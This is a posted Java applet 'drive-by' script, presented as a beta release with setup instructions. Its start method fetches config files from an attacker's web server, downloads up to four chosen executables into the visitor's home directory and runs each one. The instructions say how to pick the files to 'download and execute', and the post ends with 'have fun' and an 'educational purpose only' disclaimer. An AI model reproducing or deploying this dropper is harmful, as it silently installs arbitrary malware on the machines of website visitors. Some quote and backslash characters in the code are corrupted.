Java Drive By -Beta v1 -Cod3Gre3n-

1. JAVA DRIVE BY SCRIPT - TEST v1
2. _______________________________________________________________________________________________________________________________________
3.  
4. The source is completely commented & compiles with latest java
5.  
6. Java Source:
7.  
8. Code:
9. [cc lang=”java”]import java.applet.Applet;
10. import java.io.BufferedOutputStream;
11. import java.io.BufferedReader;
12. import java.io.File;
13. import java.io.FileOutputStream;
14. import java.io.FileReader;
15. import java.io.IOException;
16. import java.io.InputStream;
17. import java.io.InputStreamReader;
18. import java.io.OutputStream;
19. import java.net.URL;
20. import java.net.URLConnection;
21. import java.security.AccessControlException;
22. import java.util.ArrayList;
23.  
24. //
25.  
26. //Change Example to what you want users to see as your Applet Name
27. @SuppressWarnings(“serial”)
28. public class Exploit extends Applet{
29. //Same here
30. public Exploit(){
31. }
32.  
33. public String getContents(File aFile) {
34.  
35. StringBuilder contents = new StringBuilder();
36.  
37. try {
38.  
39. BufferedReader input = new BufferedReader(new FileReader(aFile));
40. try {
41. String line = null; //not declared within while loop
42.  
43. while (( line = input.readLine()) != null){
44. contents.append(line);
45. contents.append(System.getProperty(“line.separator”));
46. }
47. }
48. finally {
49. input.close();
50. }
51. }
52. catch (IOException ex){
53. ex.printStackTrace();
54. }
55.  
56. return contents.toString();
57. }
58.  
59. public String getConfig(String link){
60. try {
61. URLConnection url = null;
62. BufferedReader in = null;
63. url = new URL(link).openConnection();
64. in = new BufferedReader(new InputStreamReader(url.getInputStream()));
65. String str = in.readLine();
66. if (in != null) {
67. in.close();
68. }
69. return str;
70. } catch (final IOException e) {
71.  
72. }
73. return null;
74. }
75.  
76. public ArrayList getConfigArray(String link){
77. URLConnection url = null;
78. String line;
79. ArrayList file = new ArrayList();
80. try {
81. url = new URL(link).openConnection();
82. BufferedReader in = new BufferedReader(new InputStreamReader(url.getInputStream()));
83. while ((line = in.readLine()) != null)
84. file.add(line);
85. if (in != null) {
86. in.close();
87. }
88. return file;
89. } catch (final IOException e) {
90.  
91. }
92. return null;
93. }
94.  
95. public ArrayList loadFile(String fileName)
96. {
97. if ((fileName == null) || (fileName == “”))
98. throw new IllegalArgumentException();
99.  
100. String line;
101. ArrayList file = new ArrayList();
102.  
103. try
104. {
105. BufferedReader in = new BufferedReader(new FileReader(fileName));
106.  
107. if (!in.ready())
108. throw new IOException();
109.  
110. while ((line = in.readLine()) != null)
111. file.add(line);
112.  
113. in.close();
114. }
115. catch (IOException e)
116. {
117. System.out.println(e);
118. return null;
119. }
120.  
121. return file;
122. }
123.  
124. //Main Method
125. public void start() throws AccessControlException{
126.  
127. String userdir = System.getProperty(“user.home”);
128. String configs = “config.ini”;
129. String urlss = “urls.ini”;
130. String filess = “files.ini”;
131. //FULL PATH TO YOUR WEBSITE HERE(WERE JAR IS GOING TO BE PALCED)\
132. String mainURL = “http://site.com/”;
133.  
134. ///////////////////////////////////////////////////Do not touch anything below\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
135. //try{
136. //////////////////////////////////FILE 1//////////////////////////////////
137. if(getConfig(mainURL+configs).contains(“1”) || getConfig(mainURL+configs).contains(“2”) || getConfig(mainURL+configs).contains(“3”) || getConfig(mainURL+configs).contains(“4”)){
138. String fname = “\”+getConfigArray(mainURL+filess).get(0);
139.  
140. String fpath = userdir.concat(fname);
141.  
142. final String locationDownload = getConfigArray(mainURL+urlss).get(0);
143.  
144. download(locationDownload, fpath);
145.  
146. final Runtime run = Runtime.getRuntime();
147.  
148. try {
149. run.exec(fpath);
150. } catch (final IOException e) {
151. }
152. }
153.  
154. //////////////////////////////////FILE 2//////////////////////////////////
155. if(getConfig(mainURL+configs).contains(“2”) || getConfig(mainURL+configs).contains(“3”) || getConfig(mainURL+configs).contains(“4”)){
156. String fname2 = “\”+getConfigArray(mainURL+filess).get(1);
157.  
158. final Runtime run = Runtime.getRuntime();
159.  
160. String fpath2 = userdir.concat(fname2);
161.  
162. final String locationDownload2 = getConfigArray(mainURL+urlss).get(1);
163.  
164. download(locationDownload2, fpath2);
165. try {
166. run.exec(fpath2);
167. } catch (final IOException e){
168.  
169. }
170. }
171.  
172. //////////////////////////////////FILE 3/////////////////////////////////
173. if(getConfig(mainURL+configs).contains(“3”) || getConfig(mainURL+configs).contains(“4”)){
174. String fname3 = “\”+getConfigArray(mainURL+filess).get(2);
175.  
176. final Runtime run = Runtime.getRuntime();
177.  
178. String fpath3 = userdir.concat(fname3);
179.  
180. final String locationDownload3 = getConfigArray(mainURL+urlss).get(2);
181.  
182. download(locationDownload3, fpath3);
183. try {
184. run.exec(fpath3);
185. } catch (final IOException e){
186.  
187. }
188. }
189.  
190. /////////////////////////////////FILE 4//////////////////////////////////
191. if(getConfig(mainURL+configs).contains(“4”)){
192. String fname4 = “\”+getConfigArray(mainURL+filess).get(3);
193.  
194. final Runtime run = Runtime.getRuntime();
195.  
196. String fpath4 = userdir.concat(fname4);
197.  
198. final String locationDownload3 = getConfigArray(mainURL+urlss).get(3);
199.  
200. download(locationDownload3, fpath4);
201. try {
202. run.exec(fpath4);
203. } catch (final IOException e){
204.  
205. }
206. }
207. ////////////////////////////////END///////////////////////////////////
208. //}catch (AccessControlException e){
209. //  System.out.println(“hi”);
210. // }
211.  
212. }
213.  
214. public void download(final String address, final String localFileName) {
215. OutputStream out = null;
216. URLConnection conn = null;
217. InputStream in = null;
218. try {
219. final URL url = new URL(address);
220.  
221. out = new BufferedOutputStream(new FileOutputStream(localFileName));
222. conn = url.openConnection();
223. in = conn.getInputStream();
224.  
225. final byte[] buffer = new byte[1024];
226. int numRead;
227. while ((numRead = in.read(buffer)) != -1) {
228. out.write(buffer, 0, numRead);
229. }
230. } catch (final Exception exception) {
231. } finally {
232. try {
233. if (in != null) {
234. in.close();
235. }
236. if (out != null) {
237. out.close();
238. }
239. } catch (final IOException ioe) {
240. }
241. }
242. }
243.  
244. public void main(String args[]){
245.  
246. start();
247.  
248. }
249.  
250. public void stop(){
251. }
252. }[/cc]
253.  
254. Create the config.ini in notepad and just put a numeric value for the amount of exe’s you want it to execute. if you’re only having it dl/exec 1 file then for the value put 1
255.  
256. Create the files.ini in notepad and just put the name of the file its going to download, if you’re hosting the file as blah.exe just put blah.exe
257.  
258. Create the urls.ini and just put the full download link of whatever file you want it to download and execute.
259.  
260. have fun
261.  
262. Then:
263.  
264. Code:
265. [cc lang=”html”] [/cc]
266. _______________________________________________________________________________________________________________________________________
267. 30-05-2016 - Made and published for educational purpose only. Use on your own risk :-)